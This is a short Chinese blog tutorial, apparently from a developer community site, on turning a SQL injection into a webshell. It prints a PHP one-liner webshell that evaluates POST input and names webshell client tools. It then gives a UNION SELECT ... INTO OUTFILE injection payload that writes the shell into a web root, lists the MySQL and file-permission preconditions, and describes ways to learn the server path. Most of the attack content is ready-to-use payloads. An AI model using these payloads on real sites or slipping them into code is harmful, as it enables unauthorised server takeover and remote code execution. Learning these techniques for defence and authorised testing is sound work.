sql注入与getshell

一句话木马

php类型的一句话木马: <?php @eval($_POST['123']);?>

一句话木马利用工具:菜刀,蚁剑,冰蝎,哥斯拉

用蚁剑连接一句话木马:

通过注入点写入木马程序的前提条件

1 mysql开启了secure_file_priv=""的配置

2 知道网站代码的真实物理路径

3 物理路径具备写入权限

 通过注入点写入木马程序

在mysql中往磁盘写入文件:

         select "hello word" into outfile "C:\\phpStudy\\WWW\\test.txt";

通过注入点写入webshell:

' union select "<?php @eval($_POST['123']);?>", 2 into outfile "C:\\phpStudy\\WWW\\shell.php"#

获取后台站点真实路径:

1 信息收集,收集站点敏感目录,敏感文件,如phpinfo.php

2 站点网址输入错误的网址路径或加一些非法参数,让其报错,报错信息中可能存在路径信息

3 指纹信息收集:

        nginx默认站点根目录:/usr/share/nginx/html, 配置文件路径:/etc/nginx/nginx.conf

        apache默认站点根目录:/var/www/html

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值